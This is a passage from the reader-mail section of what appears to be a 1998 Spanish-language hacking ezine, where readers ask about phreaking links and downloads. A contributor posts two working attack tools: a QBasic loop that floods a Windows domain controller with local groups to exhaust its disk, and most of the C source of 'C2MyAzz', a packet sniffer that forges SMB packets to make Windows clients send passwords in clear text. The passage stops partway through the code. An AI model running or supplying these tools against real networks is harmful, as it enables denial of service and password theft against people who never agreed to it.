  4701.   Date:  Fri, 31 Jul 1998 16:00:33 GMT  
  4702.   From:  <Akira2o0o@xxxxxxxxxxxxxx>      
  4703.   To:  jjf_team@usa.net  
  4704.   Subject:  ............  
  4705.  
  4706.   .............ninguno de tus links de phreak sirven pues e querido bajar 
  4707.   algunos programas y me sale con que no lo encuentra......que paso pues.... 
  4708.   hay mandame un E-mail cuando las pongan a funcionar...K..... 
  4709.  
  4710.   <------>
  4711.  
  4712.   [ Ya decimos que actualizamos los link's lo mas rapido posible pero el
  4713.     web es muy dinamico, por tanto complicado estar a la ultima. ]
  4714.  
  4715. <────────────────────────────────────────────────────────────────────────────>
  4716.  
  4717.   From:  "Miguel Celis" <fliacelis@xxxxxxxxxxxxxx>
  4718.   To:  jjf_team@usa.net  
  4719.   Subject:  saludos desde colombia  
  4720.  
  4721.   mis felicitaciones por esa excelente y enviciante pagina.
  4722.   quisiera comunicarte una inquietud que tengo; fijate como solo estoy 
  4723.   incursionando al tema de los phreaker y como tengo ese interes tan 
  4724.   imenso por conocer lo que esconde en sus entrañas este nuevo (para mi 
  4725.   por lo menos) mundo quisiera que pusieras mas archivos de textos 
  4726.   refiriendose a este tema ya sea informacion general o especifica. 
  4727.   Si haces caso a mi peticion, eres tu muy amable. 
  4728.  
  4729.   saludos a tus compañeros hackers, crackers, phreakers y todo lo que se 
  4730.   invenmten nuevo que termine en "kers". 
  4731.  
  4732.   se despide !el 11! 
  4733.  
  4734.   <------>
  4735.  
  4736.   [ Pues thx, ya hemos publicado algo de phreak y tienes muchas cosas en
  4737.     nuestro web, por lo que recomiendo que te pases por la seccion PHREAK. ]
  4738.  
  4739. <────────────────────────────────────────────────────────────────────────────>
  4740.  
  4741.   From:  Nain <nii97068@xxxxxxxxxxxxxx>
  4742.   To:  jjf_team@usa.net  
  4743.   Subject:  pregunta  
  4744.  
  4745.   hola, 
  4746.   acabo de descubrir vuestra revista y me la quiero bajar... todos los nº 
  4747.   para leerla tranquilamente, sin embargo tengo un problema, siempre que 
  4748.   intento bajarmela, nunca esta completa... siempre las frases estan cortadas 
  4749.   por la mitad. que puedo hacer para solucionar esto? 
  4750.   Os ruego me respondais rapidamente porque tengo muchas ganas de terminar de 
  4751.   leerla. 
  4752.  
  4753.   Un saludo.udo. 
  4754.  
  4755.   <------>
  4756.  
  4757.   [ Pues ya hemos puesto un zip con el primer volumen entero y no pinches
  4758.     encima del ezine si no que clickea con el mouse y dale al boton derecho
  4759.     para salvar el fichero :) ]
  4760.  
  4761. <────────────────────────────────────────────────────────────────────────────>
  4762.  
  4763.   From:  "A.A.A" <claw@xxxxxxxxxxxxxx>
  4764.   Subject:  intereses  
  4765.  
  4766.   Quisiera saber porque mas de la mitad de lugares que poneis en vuestras
  4767.   listas no estan disponibles. Os los han cerrado o censurado o simplemente
  4768.   no teneis esa informacion.
  4769.   Vais a seguir publicando mas i-zine en vuestra web?
  4770.   Podrias mandarme direcciones de paginas web para principiantes al hacking,
  4771.   phreaking, y virus ya me cuesta encontrar paginas completas da igual que
  4772.   esten en ingles.
  4773.  
  4774.   <------>
  4775.  
  4776.   [ Ya hemos dicho que es dificil el asunto de los link∩s. ¿¿ Quien dice que
  4777.     no vamos a publicar mas ?? Y mas cosas que estamos haciendo ;-)
  4778.     Para ver web∩s pasate por la seccion LINKS ]
  4779.  
  4780. <────────────────────────────────────────────────────────────────────────────>
  4781.  
  4782.   From:  Daniel R. <zago@xxxxxxxxxxxxxx>
  4783.   To:  jjf_team@usa.net  
  4784.   Subject:  Pregunta  
  4785.  
  4786.   Hola acabo de visitar su pagina y me parecio que es una de las mejores que
  4787.   he visto pero tengo una pregunta que hacerles: 
  4788.  
  4789.   Quisiera poder conseguir el username y el pasword de una pagina 
  4790.   (www.anacam.com). Pude bajar "john the ripper vl.4" desde su pagina pero no 
  4791.   puedo instalarlo, hay un archivo de nombre "install" pero no le entiendo
  4792.   como puedo hacerle para poder arrancar el programa. Me podrian ayudar a
  4793.   instalar este programa ho recomendarme uno mas facil de usar. 
  4794.   DE antemano Muchas Gracias 
  4795.   ATTE. 
  4796.   Daniel R. 
  4797.  
  4798.   <------>
  4799.  
  4800.   [ Thx pero NO nos dedicamos a hackear web∩s a peticion de los lectores.
  4801.     Pasate por nuestra seccion CRACK y pillate el John, pues es raro porque
  4802.     se instala bien, vuelve a probar y leete la ayuda :) ]
  4803.  
  4804. <────────────────────────────────────────────────────────────────────────────>
  4805.  
  4806.   From:  Nombre y apellidos <xxxxxxxx@xxxxxxxxxxxxxx>
  4807.   To:  jjf_team@usa.net  
  4808.   Subject:  subscribe  
  4809.  
  4810.   He intentado bajarme los Zines pero se corta a medio, podeis
  4811.   comprimirlos todos en un zip y enviarmelos a jmt1@xxxxxxxxxxxxxx 
  4812.   Gracias. 
  4813.  
  4814.   <------>
  4815.  
  4816.   [ No podemos enviarlos a todos los lectores, ya hemos puesto el primer
  4817.     volumen en zip y unos cuantos mail∩s arriba explicamos como lo tienes
  4818.     que poder bajar correctamente. ]
  4819.  
  4820. <────────────────────────────────────────────────────────────────────────────>
  4821.  
  4822.   From:  Elena <prophet@xxxxxxxxxxxxxx>      
  4823.   To:  jjf_team@usa.net  
  4824.   Subject:  {CyBoRg} Continuacion respuesta  
  4825.  
  4826.   Bueno sigo con la respuesta a DANY, por aki tengo un programilla 
  4827.   en qbasic que es un DoS, te lo pongo para que veas, este DoS lo 
  4828.   que hace es que empieza a crear grupos locales en un PDC. Asi 
  4829.   que en un rato de na el PDC esta saturado de grupos y se llena 
  4830.   el HD y se queda colgao, (me he pasao explicando lo que hace) 
  4831.  
  4832. ------------ Codigo Fuente ---------------------------------------------------
  4833.  
  4834. DIM var AS INTEGER 
  4835. DIM hack1 AS STRING 
  4836. DIM hack2 AS STRING 
  4837. DO WHILE var < 10000000 
  4838. var = var + 1 
  4839. hack1 = "hack" + LTRIM$(STR$ (var)) 
  4840. hack2 = "net localgroup " + hack1 + " /add /domain" 
  4841. SHELL hack2 
  4842. LOOP 
  4843.  
  4844. ------------ FIN -------------------------------------------------------------
  4845.  
  4846.   Bueno, ya si que os dejo de una vez, joder que calor........... 
  4847.  
  4848.   {CyBoRg} 
  4849.   SHG Security Group 
  4850.  
  4851.   <------>
  4852.  
  4853.   [ Pues muchas gracias por ayudar con esta seccion :) ]
  4854.  
  4855. <────────────────────────────────────────────────────────────────────────────>
  4856.  
  4857.   From:  Elena <prophet@xxxxxxxxxxxxxx>
  4858.   To:  jjf_team@usa.net  
  4859.   Subject:  {CyBoRg} - SHG Security -  
  4860.  
  4861.   Hi, de nuevo, os envio este mensaje para responder a "DANY" que 
  4862.   preguntaba sobre troyanos para NT en visual basic o pascal, le 
  4863.   digo que es muy dificil encontrar algo en estos lenguajes, a no 
  4864.   ser que lo hagas tu. Nosotros hemos llegado a hacer un 
  4865.   programilla de seguridad para NT en visual para chapar cosas del 
  4866.   registro, aunque lo del regedit es un coñazo y mas si se lo 
  4867.   haces a alguien remotamente :))). 
  4868.  
  4869.   Bueno aqui te pongo el fuente de un programa para capturar pass 
  4870.   en texto plano es en C, pero bueno, haber si encuentro otro 
  4871.   troyano que tenia, lo he perdido entre todas las cosas que tengo 
  4872.   y si lo encuentro lo envio luego. 
  4873.  
  4874. ------------ Codigo Fuente ---------------------------------------------------
  4875.  
  4876. /* 
  4877. C2MyAzz - Sirve para capturar login y pass en texto plano 
  4878.  
  4879. */ 
  4880. #include <dos.h> 
  4881. #include <stdio.h> 
  4882. #include <stdlib.h> 
  4883. #include <string.h> 
  4884.  
  4885. #pragma pack(1) 
  4886.  
  4887. #include "c2myazz.h" 
  4888.  
  4889. #define MAXENTRIES 20 
  4890.  
  4891. // Function prototypes 
  4892.  
  4893. void _loadds _far CntrlEntryPt (); 
  4894. void _loadds _far RxISR (); 
  4895. u8 stuffit(IPpac _far *, PID _far *, u8 _far *); 
  4896. void _loadds _far TXCompleteESR(); 
  4897. void init(); 
  4898. void _loadds _far grabit(); 
  4899.  
  4900.  
  4901. // Global data 
  4902. void (_far * LSLInitEntryPt)(); //ptr to func that returns a ptr 
  4903. InfoBlock LSLInfoBlock; // LSL Info block - 2 ptrs 
  4904. RxNode Rnode; 
  4905. u16 BoardNum; 
  4906. ODIStat Rtn; 
  4907. void (_far * LSLProtocolSupportEntryPt)(); // ptr LSL funct 
  4908. void (_far * LSLGenServicesEntryPt )(); 
  4909. void (_far * MLIDSupportEntryPt)(); 
  4910. void (_far * MLIDControlEntryPt)(); 
  4911. u8 _far * signature; 
  4912. union REGS regsin; 
  4913. union REGS regsout; 
  4914. struct SREGS segs; 
  4915. configtbl cfgtab; 
  4916. stattbl stattab; 
  4917. EventCB XmitECB=3d{0}; 
  4918. u8 immAddr[6]; 
  4919. EventCB _far * ECB; 
  4920. LookAhead _far * LkAhead; 
  4921. IPpac _far * pacptr; 
  4922. u16 CurEntry =3d 0; // index for big buffer 
  4923. IPInfo Data [MAXENTRIES]; // big buffer for captured data 
  4924. u16 DataEnd; 
  4925. u8 sendOK; 
  4926. u8 getpkt; 
  4927. EventCB _far * RcvECB; 
  4928.  
  4929. //************************************************************************* 
  4930. // 
  4931. // Build CntrlEntryPt as required by LSL. 
  4932. // upon entry: 
  4933. // bx =3d function number (0-8) 
  4934. // cx =3d parameter as required by bx 
  4935. // es:si =3d ptr as required by bx 
  4936. // upon exit: 
  4937. // ax =3d completion code ( 0 =3d successful) 
  4938. // es:si =3d as required by bx 
  4939. // registers DS BP ES SI SS SP preserved 
  4940. // 
  4941. //******************************************************************* 
  4942.  
  4943. void _loadds _far CntrlEntryPt () 
  4944. _asm 
  4945. mov ax, 0 ; preset AX to success 
  4946.  
  4947. test bx, 0 
  4948. je getcfg 
  4949.  
  4950. test bx, 1 
  4951. je getstat 
  4952.  
  4953. test bx, 2 
  4954. je LSLbind 
  4955.  
  4956. test bx, 3 
  4957. je unbind 
  4958.  
  4959. test bx, 4 
  4960. je dereg 
  4961.  
  4962. test bx, 5 
  4963. je promis 
  4964.  
  4965. test bx, 6 
  4966. je reserve 
  4967.  
  4968. test bx, 7 
  4969. je reserve 
  4970.  
  4971. test bx, 8 
  4972. je manage 
  4973.  
  4974. jmp error 
  4975.  
  4976. getcfg: 
  4977. mov ax, SEG cfgtab 
  4978. mov es,ax 
  4979. mov ax,0 
  4980. mov si, OFFSET cfgtab 
  4981. jmp goback 
  4982.  
  4983. getstat: 
  4984. mov ax,SEG stattab 
  4985. mov es,ax 
  4986. mov ax,0 
  4987. mov si, OFFSET stattab 
  4988. jmp goback 
  4989.  
  4990. LSLbind: 
  4991. mov ax, 08009h 
  4992. jmp goback 
  4993.  
  4994. unbind: 
  4995. jmp goback 
  4996.  
  4997. dereg: 
  4998. jmp goback 
  4999.  
  5000. promis: 
  5001. jmp goback 
  5002.  
  5003. reserve: 
  5004. jmp error 
  5005.  
  5006. manage: 
  5007. jmp goback 
  5008.  
  5009. error: 
  5010. mov ax, 08008h ; bad command 
  5011. jmp goback 
  5012.  
  5013. goback: 
  5014.  
  5015.  
  5016. //***************************************************************** 
  5017. // 
  5018. // Rx ISR - called by LSL 
  5019. // 
  5020. // Grabs the lookahead buffer from LSL and passes it to Stuffit 
  5021. // If the packet is of intereset, call LSL and get an ECB from 
  5022. // LSL's pool, sends to grabit 
  5023. // 
  5024. // 
  5025. //****************************************************************** 
  5026.  
  5027. #pragma check_stack(off) 
  5028.  
  5029. void _loadds _far RxISR () 
  5030. _asm 
  5031. mov word ptr LkAhead, di 
  5032. pop ax ; get callers ds into ax 
  5033. push ax 
  5034. mov word ptr LkAhead+2, ax 
  5035. push di 
  5036. push si 
  5037. push es 
  5038.  
  5039. // Check to see if we want this packet 
  5040. getpkt=3d(stuffit ((IPpac _far *)LkAhead->DataPtr, &LkAhead->ProtocolID, 
  5041. &(LkAhead->MediaHdr[6]))); 
  5042.  
  5043. if(getpkt =3d=3d 0) 
  5044. _asm 
  5045. pop es 
  5046. pop si 
  5047. pop di 
  5048. mov ax, 8001h ; pass to next scanner 
  5049. or ax, ax ; set ZF based on value of AX 
  5050. else 
  5051. _asm 
  5052. mov bx,0 ;Get an ECB from LSL's pool 
  5053. call far ptr LSLProtocolSupportEntryPt 
  5054. mov word ptr[RcvECB],si 
  5055. mov word ptr[RcvECB+2],es 
  5056.  
  5057. // Fill out the necessary fields in the ECB 
  5058.  
  5059. RcvECB->BoardNum=3d0; 
  5060. RcvECB->ProtocolID[0]=3d0; 
  5061. RcvECB->ProtocolID[1]=3d0; 
  5062. RcvECB->ProtocolID[2]=3d0; 
  5063. RcvECB->ProtocolID[3]=3d0; 
  5064. RcvECB->ProtocolID[4]=3d8; 
  5065. RcvECB->ProtocolID[5]=3d0; 
  5066. RcvECB->ProtocolNum=3d0xABCD; 
  5067. RcvECB->DataLen=3d1480; 
  5068. RcvECB->Frag1Len=3d1480; 
  5069. RcvECB->FragCnt=3d1; 
  5070. RcvECB->ECBISR=3dgrabit; 
  5071. RcvECB->Frag1Addr=3d((u8 far *)((void far 
  5072. *)RcvECB)+(((sizeof(EventCB)+3)>> 2) << 2)); 
  5073.  
  5074. _asm 
  5075. add sp,4 
  5076. mov word ptr ss:[bp-4],si 
  5077. xor ax, ax ;clear AX and reset ZF 
  5078. pop di 
  5079.  
  5080. //************************************************************* 
  5081. // Init - checks for supporting software and hardware 
  5082. // 
  5083. //************************************************************* 
  5084.  
  5085. void init() 
  5086. u16 i; 
  5087. u16 ComCode; 
  5088.  
  5089. //***************************************************************** 
  5090. // Initialization routines 
  5091. // Check to see if LSL is loaded (int vector 2F is viable) 
  5092.  
  5093. regsin.x.ax =3d 0x352f; 
  5094.  
  5095. intdosx ( «sin, «sout, &segs); 
  5096.  
  5097. if (((regsout.x.bx | segs.es ) =3d=3d 0) || ((regsout.x.bx & segs.es ) 
  5098. =3d=3d -1)) 
  5099. printf ("C2MyAzz: LSL not loaded. Exiting.\n "); 
  5100. exit; 
  5101.  
  5102. // Locate the LSL intial entry pt. Note that we're scanning 
  5103. // for TSRs, starting at C0 to FF. 
  5104.  
  5105. for ( i =3d 0xC0; i < 0xFF; i ++) 
  5106. regsin.h.ah =3d i; 
  5107. regsin.h.al =3d 0; 
  5108.  
  5109. int86x (0x2F, «sin, «sout, &segs); 
  5110.  
  5111. if ( regsout.h.al =3d=3d 0xFF) // something is installed, check it 
  5112. (long)signature =3d (long)regsout.x.si ; // ptr to LSL id 
  5113. (long)signature =3d ((long)segs.es << 16) | (long)signature; 
  5114.  
  5115. if (_fstrncmp ((u8 _far *)signature, (u8 _far *)"LINKSUP$", 8)) // 
  5116. check for LSL id 
  5117. continue; // not LSL, continue 
  5118. else 
  5119. (long)LSLInitEntryPt =3d (long)regsout.x.bx ; 
  5120. (long)LSLInitEntryPt =3d (long)LSLInitEntryPt | 
  5121. ((long)regsout.x.dx << 16); 
  5122. break; // got LSL exit loop 
  5123.  
  5124. if (!LSLInitEntryPt) 
  5125. printf ("C2MyAzz: LSL is not loaded \n "); 
  5126. exit; 
  5127.  
  5128. LSLInfoBlock.LSLAPI =3d 0; 
  5129.  
  5130. // call the LSL initial entry pt to fill in the LSL info block 
  5131.  
  5132. _asm 
  5133. push es 
  5134. push ds 
  5135. mov ax, SEG LSLInfoBlock 
  5136. mov es, ax 
  5137. mov si, OFFSET LSLInfoBlock ; ES:SI =3d ptr to info block 
  5138. mov bx, 4 ; bx =3d req code 4 
  5139. call far ptr LSLInitEntryPt ; get LSL info block 
  5140. pop ds 
  5141. pop es 
  5142.  
  5143. // move function ptrs from info block (optional) 
  5144.  
  5145. LSLProtocolSupportEntryPt =3d (void (_far *)())LSLInfoBlock.LSLAPI; 
  5146. LSLGenServicesEntryPt =3d (void (_far *)())LSLInfoBlock.GSAPI; 
  5147. MLIDSupportEntryPt =3d (void (_far *)())LSLInfoBlock.MLIDAPI; 
  5148. // Assume that we're only dealing with one board 
  5149. BoardNum =3d 0; 
  5150.  
  5151. // Get MLID Control Entry point for later use 
  5152.  
  5153. _asm 
  5154. push es 
  5155. push ds 
  5156. mov ax, BoardNum 
  5157. mov bx, 012h ; Get MLID Control Entry Pt 
  5158. call far ptr LSLProtocolSupportEntryPt 
  5159. mov word ptr [MLIDControlEntryPt], si 
  5160. mov word ptr [MLIDControlEntryPt +2], es 
  5161. pop ds 
  5162. pop es 
  5163. mov ComCode, ax 
  5164.  
  5165. if (ComCode !=3d 0) 
  5166. printf ("C2MyAzz: cannot get MLID control entry pt rtn =3d %x. Is your 
  5167. MLID loaded? \n", ComCode); 
  5168. exit; 
  5169.  
  5170. // Set the look ahead size of MLID to 128 bytes 
  5171. _asm 
  5172. push es 
  5173. push ds 
  5174. mov ax, BoardNum 
  5175. mov bx, 9 ;set look ahead size 
  5176. mov cx, 80h 
  5177. call far ptr MLIDControlEntryPt 
  5178. pop ds 
  5179. pop es 
  5180. mov ComCode, ax 
  5181.  
  5182. if (ComCode !=3d 0) 
  5183. printf ("C2MyAzz: cannot set look ahead size to 128 rtn =3d %x \n", 
  5184. ComCode); 
  5185. exit; 
  5186.  
  5187. printf ("C2MyAzz: Lookahead set to 128 bytes \n"); 
  5188.  
  5189. // Register the RX prescanner stack with LSL 
  5190. // init RX Node CB 
  5191.  
  5192. Rnode.boardnum =3d BoardNum; 
  5193. Rnode.position =3d LAST_MUST; 
  5194. Rnode.ISR =3d &RxISR; 
  5195. Rnode.StackID =3d 0xABCD; 
  5196. Rnode.ControlEntryPt =3d &CntrlEntryPt; 
  5197. Rnode.PacFilterMsk =3d 0xFFFF; 
  5198.  
  5199. _asm 
  5200. push es 
  5201. push ds 
  5202. mov ax,ds 
  5203. mov es,ax 
  5204. mov si, OFFSET Rnode 
  5205. mov bx, 01Ch ;register the RX prescanner 
  5206. call far ptr LSLProtocolSupportEntryPt 
  5207. pop ds 
  5208. pop es 
  5209. mov ComCode, ax 
  5210.  
  5211. if (ComCode !=3d 0) 
  5212. printf("C2MyAzz: cannot register RX prescanner rtn =3d %x \n", ComCode); 
  5213. exit; 
  5214.  
  5215. printf("C2MyAzz: Receive prescanner now registered \n"); 
  5216.  
  5217. // Enable promiscuous mode on the adapter so the we will receive all packets 
  5218.  
  5219. _asm 
  5220. push es 
  5221. push ds 
  5222. mov ax, BoardNum 
  5223. mov bx, 0ah ;set promiscuous mode 
  5224. mov cx, 1 ;all frames 
  5225. call far ptr MLIDControlEntryPt 
  5226. pop ds 
  5227. pop es 
  5228. mov ComCode, ax 
  5229.  
  5230. if (ComCode !=3d 0) 
  5231. printf("C2MyAzz: cannot set board in promiscuous mode rtn =3d %x \n", 
  5232. ComCode); 
  5233. printf(" Does your board support promiscuous mode? \n"); 
  5234. exit; 
  5235. printf ("C2MyAzz: Board now in promiscuous mode \n"); 
  5236.  
  5237. // Reset prescan stack to accept all frames 
  5238.  
  5239. i=3dRnode.StackID; // Cheat the assembler 
  5240. _asm 
  5241. push es 
  5242. push ds 
  5243. mov ax, BoardNum 
  5244. mov bx, 02bh ;modify stack filter 
  5245. mov cx, i 
  5246. mov dx, 0ffffh ;take everything 
  5247. call far ptr LSLProtocolSupportEntryPt 
  5248. pop ds 
  5249. pop es 
  5250. mov ComCode, ax 
  5251.  
  5252. if (ComCode !=3d 0) 
  5253. printf("C2MyAzz: cannot set stack filter rtn =3d %x \n", ComCode); 
  5254. exit; 
  5255.  
  5256. //***************************************************************************** 
  5257. // Uninit - deregisters the prescan stack 
  5258. //***************************************************************************** 
  5259.  
  5260. void uninit(void) 
  5261. u16 ComCode; 
  5262.  
  5263. _asm 
  5264. push es 
  5265. push ds 
  5266. mov ax,ds 
  5267. mov es,ax 
  5268. mov si, OFFSET Rnode 
  5269. mov bx, 01Fh ;Deregister the RX prescanner 
  5270. call far ptr LSLProtocolSupportEntryPt 
  5271. pop ds 
  5272. pop es 
  5273. mov ComCode, ax 
  5274.  
  5275. if (ComCode !=3d 0) 
  5276. printf("C2MyAzz: cannot deregister RX prescanner rtn =3d %x \n", 
  5277. ComCode); 
  5278. return; 
  5279.  
  5280. u8 stuffit(IPpac _far *pacptr, PID _far *pid, u8 _far *immAddr) 
  5281. //Check to see if this is an SMB within IP 
  5282. if (_fstrncmp((void far *)pacptr->x.SMB.IDString, (void far *) "SMB", 3) 
  5283. !=3d 0) 
  5284. return(0); 
  5285.  
  5286. //Is this packet a SMB Neg Request? 
  5287. if(pacptr->x.SMB.FunctionCode < 0x72) 
  5288. return(0); 
  5289.  
  5290. //Is this packet creating a server connection? 
  5291. if(pacptr->x.SMB.FunctionCode > 0x73) 
  5292. return(0); 
  5293.  
  5294. //Must be a packet of interest. 
  5295. return(1); 
  5296.  
  5297. void _loadds _far grabit(void) 
  5298. //Grab what we need from the packet 
  5299. if (CurEntry < MAXENTRIES) // test for overflow 
  5300. pacptr=3d(IPpac _far *)RcvECB->Frag1Addr; 
  5301.  
  5302. Data[CurEntry].size=3d((pacptr->length >> 8) & 0x00FF) | 
  5303. ((pacptr->length << 8)& 0xFF00); 
  5304. _fmemmove((void far *) Data[CurEntry].data, (void far *) pacptr, 
  5305. Data[CurEntry].size); 
  5306. _fmemmove((void far *) &Data[CurEntry].pid, (void far *) 
  5307. RcvECB->ProtocolID, sizeof(PID)); 
  5308. _fmemmove((void far *) Data[CurEntry].immAddr, (void far *) 
  5309. RcvECB->ImmAddr, 6); 
  5310. _fmemmove((void far *) &Data[CurEntry].type, (void far 
  5311. *)pacptr->x.SMB.FunctionCode, 2); 
  5312.  
  5313. _asm 
  5314. mov bx,1 ;Return ECB to LSL pool 
  5315. mov si, word ptr[RcvECB] 
  5316. mov es, word ptr[RcvECB+2] 
  5317. call far ptr LSLProtocolSupportEntryPt 
  5318. xor ax, ax ;clear AX and reset ZF 
  5319.  
  5320. CurEntry++; // bump counter for next packet 
  5321.  
  5322. #pragma check_stack(on) 
  5323.  
  5324. //************************************************************* 
  5325. // Empty transmit complete ESR for LSL 
  5326. // 
  5327. //************************************************************* 
  5328.  
  5329. void _loadds _far TXCompleteESR() 
  5330. // Stack is ready for the next packet 
  5331. sendOK=3d0; 
  5332.  
  5333. //************************************************************* 
  5334. // 
  5335. // Main processing of the packet occurs here. 
  5336. // Setup the forged ECB, then loop until a packet comes in 
  5337. // 
  5338. //************************************************************* 
  5339.  
  5340. main () 
  5341. IPpac *ECBData; 
  5342. u8 buffer[256]; 
  5343. ODIStat Rtn; 
  5344. u16 i; 
  5345. u16 ComCode; 
  5346. u16 j; 
  5347. ODIStat Stat; 
  5348. int ch; 
  5349. u32 SourceAddress; 
  5350. u32 DestAddress; 
  5351. u16 sourcePort; 
  5352. u16 destPort; 
  5353. u32 seqNum; 
  5354. u32 ackNum; 
  5355. u32 nextseqNum; 
  5356. u16 MuxID; 
  5357. u16 TreeID; 
  5358. u16 ProcID; 
  5359. u8 type; 
  5360. PID pid; 
  5361. char password[24]; 
  5362. char username[16]; 
  5363. u8 commandresp; 
  5364. u32 sum; 
  5365. u16 *ptr; 
  5366. u16 pktlen; 
  5367. u8 foundpw; 
  5368. u8 pwlen; 
  5369. u8 wstype; // 0 if 95, 1 if NT 
  5370.  
  5371. printf("C2MyAzz - Tricks Microsoft Networking clients to send their password 
  5372. as\n"); 
  5373. printf(" clear text. Displays a username/password combination. 
  5374. \n"); 
  5375. printf(" C2MyAzz requires LSL and a promiscuous mode LAN 
  5376. driver.\n\n"); 
  5377. printf(" Use at your own risk. Read Microsoft's CIFS 
  5378. documentation\n"); 
  5379. printf(" for more NT security holes. Copyright(c) 1997 \n\n\n"); 
  5380.  
  5381. // Setup for prescan 
  5382. init(); 
  5383. printf("C2MyAzz: All packets will now be received\n"); 
  5384. printf("C2MyAzz: Ready to scan for passwords\n"); 
  5385. printf("C2MyAzz: (press any key to exit)\n\n\n"); 
  5386.  
  5387. // Setup some of the static ECB information so that we don't waste cycles 
  5388. // when processing the packets 
  5389.  
  5390. XmitECB.Frag1Addr =3d buffer; 
  5391. ECBData =3d (IPpac *)buffer; 
  5392. XmitECB.DataLen =3d 105; 
  5393. XmitECB.ECBISR =3d TXCompleteESR; 
  5394. XmitECB.Frag1Len =3d 105; 
  5395. XmitECB.BoardNum =3d BoardNum; 
  5396. XmitECB.FragCnt =3d 1; 
  5397. XmitECB.NxtECB =3d (void far *) 0; 
  5398. XmitECB.PreECB =3d (void far *) 0; 
  5399.  
  5400. ECBData->version=3d0x45; 
  5401. ECBData->type=3d0x00; 
  5402. ECBData->length=3d0x6900; // Must byte-swap all words 
  5403. ECBData->identification=3d0xEEEE; // Should be ignored since no 
  5404. fragging 
  5405. ECBData->flags1=3d0x0040; 
  5406. ECBData->ttl=3d0x80; 
  5407. ECBData->protocol=3d0x06; 
  5408. ECBData->window=3d0x5221; 
  5409. ECBData->dataOffset=3d0x50; 
  5410. ECBData->flags2=3d0x18; 
  5411. ECBData->pad1=3d0x00; 
  5412. ECBData->nbtype=3d0x00; 
  5413. ECBData->nbflags=3d0x00; 
  5414. ECBData->nblength=3d0x4100; 
  5415.  
  5416. // Setup the ECB data for a raw send. We're building the SMB packet to 
  5417. spoof 
  5418. // client into sending their password clear text on the wire. Most of the 
  5419. // information was taken from an SMB client accessing our local SAMBA server 
  5420.  
  5421. ECBData->x.RAW.buf[0]=3d0xff; 
  5422. ECBData->x.RAW.buf[1]=3d0x53; 
  5423. ECBData->x.RAW.buf[2]=3d0x4d; 
  5424. ECBData->x.RAW.buf[3]=3d0x42; 
  5425. ECBData->x.RAW.buf[4]=3d0x72; 
  5426. ECBData->x.RAW.buf[5]=3d0x00; 
  5427. ECBData->x.RAW.buf[6]=3d0x00; 
  5428. ECBData->x.RAW.buf[7]=3d0x00; 
  5429. ECBData->x.RAW.buf[8]=3d0x00; 
  5430. ECBData->x.RAW.buf[9]=3d0x81; 
  5431. ECBData->x.RAW.buf[10]=3d0x00; 
  5432. ECBData->x.RAW.buf[11]=3d0x00; 
  5433. ECBData->x.RAW.buf[12]=3d0x00; 
  5434. ECBData->x.RAW.buf[13]=3d0x00; 
  5435. ECBData->x.RAW.buf[14]=3d0x00; 
  5436. ECBData->x.RAW.buf[15]=3d0x00; 
  5437. ECBData->x.RAW.buf[16]=3d0x00; 
  5438. ECBData->x.RAW.buf[17]=3d0x00; 
  5439. ECBData->x.RAW.buf[18]=3d0x00; 
  5440. ECBData->x.RAW.buf[19]=3d0x00; 
  5441. ECBData->x.RAW.buf[20]=3d0x00; 
  5442. ECBData->x.RAW.buf[21]=3d0x00; 
  5443. ECBData->x.RAW.buf[22]=3d0x00; 
  5444. ECBData->x.RAW.buf[23]=3d0x00; 
  5445.  
  5446. // We need the Tree ID, Process ID, and Mux ID from the look ahead buffer 
  5447. // since these fields change on every connection 
  5448. //ECBData->x.RAW.buf[24]=3d0x00; Tree ID 
  5449. //ECBData->x.RAW.buf[25]=3d0x00; 
  5450. //ECBData->x.RAW.buf[26]=3d0xbf; Process ID 
  5451. //ECBData->x.RAW.buf[27]=3d0x1b; 
  5452.  
  5453. ECBData->x.RAW.buf[28]=3d0x00; 
  5454. ECBData->x.RAW.buf[29]=3d0x00; 
  5455.  
  5456. //ECBData->x.RAW.buf[30]=3d0x81; Mux ID 
  5457. //ECBData->x.RAW.buf[31]=3d0x40; 
  5458.  
  5459. ECBData->x.RAW.buf[32]=3d0x0D; 
  5460. ECBData->x.RAW.buf[33]=3d0x02; // Dialect 2 for 95 ws, Dialect 5 for NT 
  5461. ECBData->x.RAW.buf[34]=3d0x00; 
  5462. ECBData->x.RAW.buf[35]=3d0x01; 
  5463. ECBData->x.RAW.buf[36]=3d0x00; 
  5464. ECBData->x.RAW.buf[37]=3d0x04; 
  5465. ECBData->x.RAW.buf[38]=3d0x11; 
  5466. ECBData->x.RAW.buf[39]=3d0x02; 
  5467. ECBData->x.RAW.buf[40]=3d0x00; 
  5468. ECBData->x.RAW.buf[41]=3d0x01; 
  5469. ECBData->x.RAW.buf[42]=3d0x00; 
  5470. ECBData->x.RAW.buf[43]=3d0x03; 
  5471. ECBData->x.RAW.buf[44]=3d0x00; 
  5472. ECBData->x.RAW.buf[45]=3d0xB0; 
  5473. ECBData->x.RAW.buf[46]=3d0x8B; 
  5474. ECBData->x.RAW.buf[47]=3d0xA1; 
  5475. ECBData->x.RAW.buf[48]=3d0x00; 
  5476. ECBData->x.RAW.buf[49]=3d0x2B; 
  5477. ECBData->x.RAW.buf[50]=3d0x52; 
  5478. ECBData->x.RAW.buf[51]=3d0x5C; 
  5479. ECBData->x.RAW.buf[52]=3d0x22; 
  5480. ECBData->x.RAW.buf[53]=3d0xA4; 
  5481. ECBData->x.RAW.buf[54]=3d0x01; 
  5482. ECBData->x.RAW.buf[55]=3d0x00; 
  5483. ECBData->x.RAW.buf[56]=3d0x00; 
  5484. ECBData->x.RAW.buf[57]=3d0x00; 
  5485. ECBData->x.RAW.buf[58]=3d0x00; 
  5486. ECBData->x.RAW.buf[59]=3d0x00; 
  5487. ECBData->x.RAW.buf[60]=3d0x00; 
  5488. ECBData->x.RAW.buf[61]=3d0x00; 
  5489. ECBData->x.RAW.buf[62]=3d0x00; 
  5490. ECBData->x.RAW.buf[63]=3d0x00; 
  5491. ECBData->x.RAW.buf[64]=3d0x00; 
  5492. ECBData->x.RAW.buf[65]=3d0x00; 
  5493. ECBData->x.RAW.buf[66]=3d0x00; 
  5494. ECBData->x.RAW.buf[67]=3d0x00; 
  5495. ECBData->x.RAW.buf[68]=3d0x00; 
  5496. ECBData->x.RAW.buf[69]=3d0x00; 
  5497. ECBData->x.RAW.buf[70]=3d0x00; 
  5498. ECBData->x.RAW.buf[71]=3d0x00; 
  5499. ECBData->x.RAW.buf[72]=3d0x00; 
  5500. ECBData->x.RAW.buf[73]=3d0x00; 
  5501. ECBData->x.RAW.buf[74]=3d0x00; 
